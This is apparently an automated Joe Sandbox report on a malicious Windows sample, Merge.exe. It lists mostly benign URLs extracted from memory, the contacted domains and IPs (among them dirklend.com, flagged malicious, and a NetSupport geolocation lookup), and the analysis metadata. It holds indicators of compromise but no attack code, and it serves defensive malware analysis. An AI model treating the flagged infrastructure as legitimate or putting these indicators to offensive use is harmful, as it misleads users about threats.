                                http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp:0%Avira URL Cloudsafe
                                http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;;0%Avira URL Cloudsafe
                                http://quoteunquoteapps.comhttp://basicrecipe.comCopyright0%Avira URL Cloudsafe
                                http://ffdshow-tryout.sourceforge.net/0%Avira URL Cloudsafe
                                http://diracvideo.org/0%Avira URL Cloudsafe
                                http://www.fourcc.org/indexrgb.htm;;;RGB0%Avira URL Cloudsafe
                                http://www.webmproject.org;;;YUV;4:2:00%Avira URL Cloudsafe
                                http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;Lossless0%Avira URL Cloudsafe
                                http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdf0%Avira URL Cloudsafe
                                http://www.cyberlink.com;;;0%Avira URL Cloudsafe
                                http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads0%Avira URL Cloudsafe
                                http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUV0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                dirklend.com
                                		162.33.178.193
                                		truetrue
                                  		unknown
                                  geo.netsupportsoftware.com
                                  		104.26.1.231
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fourcc.org/indexyuv.htm;;;YUV;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.isky.co.kr/html/cs/download.jspDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://%s/testpage.htmwininet.dllDisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.dolby.com/consumer/technology/trueHD.htmlDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          http://ffdshow-tryout.sourceforge.net/;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.divx.com;;;YUV;4:2:0DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.r-wipe.comListBoxMerge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.winnov.com/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://base.fims.tvDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.smpte-ra.org/schemas/2067-2/2016/PKLDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.speex.org/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://%s/testpage.htmDisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.iis.fraunhofer.de/amm/index.html;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lucasarts.com/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://resolume.com/software/codec;;VersionDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              		high
                                              http://www.indyproject.org/DisplayPhotoViewer.exe, 00000006.00000002.3097931052.00000000029F4000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpfalse
                                                		high
                                                http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                  		high
                                                  http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htmDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.blackmagicdesign.com/products/blackmagicraw;XQ;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    		high
                                                    http://world.casio.com/;CasioDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenUDisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://mediaxw.sourceforge.net;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smpDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.hDisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://mediaarea.net/temp/baseMediaService-V1_1_0.xsdDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      		high
                                                      http://eMajix.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.streambox.com/products/act-L2_codec.htmDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.real.com;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://eMajix.com;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsdDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                        		high
                                                        http://www.iso.org/;JPEGDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                          		high
                                                          http://www.real.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            		high
                                                            http://www.vorbis.com;;ModeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.real.com;LCDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://description.fims.tvDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://mediaarea.net/XVID;;;YUV;4:2:0DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              		high
                                                              http://www.cinepak.com/text.html;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://freeimage.sourceforge.netDisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:1DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.smpte.org/;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.theora.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.on2.com/vp7.php3;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://dividix.host.skDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cyberlink.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                		high
                                                                http://www.digicine.com/PROTO-ASDCP-AM-20040311#DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.vorbis.com/;LossyDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://mysif.ru/SIF1_dd_Eng.htm;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                  		high
                                                                  http://ffdshow.sourceforge.net/tikiwiki/tiki-index.php?page=GettingDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.loc.gov/mix/v20xmlns:mixhttp://www.loc.gov/mix/v20DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                    		high
                                                                    http://127.0.0.1DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpfalse
                                                                      		high
                                                                      http://www.musepack.net;LossyDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenUDisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.adobe.fr/products/encore/;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://ffdshow-tryout.sourceforge.net/;;;YUV;4:2:0DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://video.google.com/playerdownload.htmlDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                        		high
                                                                        http://www.macromedia.com/go/getflashplayerDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          		high
                                                                          http://www.smpte-ra.org/schemas/2067-2/2013DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.iis.fraunhofer.de/amm/index.html;;VersionDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://secure.r-tt.com/UserConsole.shtmlopenDisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.winnov.com/;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.array.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://geo.netsupportsoftware.comlocation/loca.aspDisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.nero.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                            		high
                                                                            https://xiph.org/flac/;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              		high
                                                                              http://winace.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exeDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.nerodigital.comDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.real.com;;;;;;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htmlDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:salesMerge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.digitalvoodoo.net/;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://mediaxw.sourceforge.netDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.playon.tv/playlaterDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://html4/loose.dtdDisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                		high
                                                                                https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlDisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.netsupportschool.com/tutor-assistant.asp118DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.q-team.de;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.cineform.com/products/ConnectHD.htmDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp:DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    		high
                                                                                    http://quoteunquoteapps.comhttp://basicrecipe.comCopyrightDisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.fourcc.org/indexrgb.htm;;;RGBDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://diracvideo.org/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://ffdshow-tryout.sourceforge.net/DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;LosslessDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.webmproject.org;;;YUV;4:2:0DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdfDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.cyberlink.com;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloadsDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUVDisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    162.33.178.193
                                                                                    		dirklend.comUnited States
                                                                                    		14390CORENETUStrue
                                                                                    104.26.1.231
                                                                                    		geo.netsupportsoftware.comUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1575379
                                                                                    Start date and time:2024-12-15 11:49:12 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 1s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:8
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Merge.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal42.rans.spyw.evad.winEXE@3/44@2/2
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
